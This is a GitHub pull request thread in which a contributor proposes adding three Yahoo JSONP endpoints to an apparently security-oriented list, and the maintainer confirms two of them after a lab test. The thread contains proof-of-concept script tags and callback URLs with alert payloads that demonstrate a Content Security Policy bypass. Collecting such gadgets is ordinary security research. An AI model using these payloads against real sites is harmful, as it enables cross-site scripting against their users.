Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added 3 Yahoo Json End Points #2

Open
wants to merge 1 commit into
base: master
Choose a base branch
from

Conversation

@zigoo0
Copy link
Owner

zigoo0 commented Oct 28, 2019

Added 3 yahoo jsonp

* https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)

* https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)

* https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-

Thank you for sharing these links.

The first link is already in the list. Second and third are not considered due to "/*" in the response, which prevents the execution of called functions (i.e. alert).

Wish you a nice day.

@zigoo0 zigoo0 closed this Oct 28, 2019
@cyber-niz
Copy link
Author

Oh i am sorry,
1st one is already there.
Ok,
but Second and third are executed correctly.
you can check that using this script tags

<script src=https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)//></script>
<script src=https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1337)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-></script>

Capture
Capture

Capture
Capture

@zigoo0
Copy link
Owner

zigoo0 commented Nov 5, 2019

Thanks for the extra information. Tested it in the lab and it worked.

@zigoo0 zigoo0 reopened this Nov 5, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants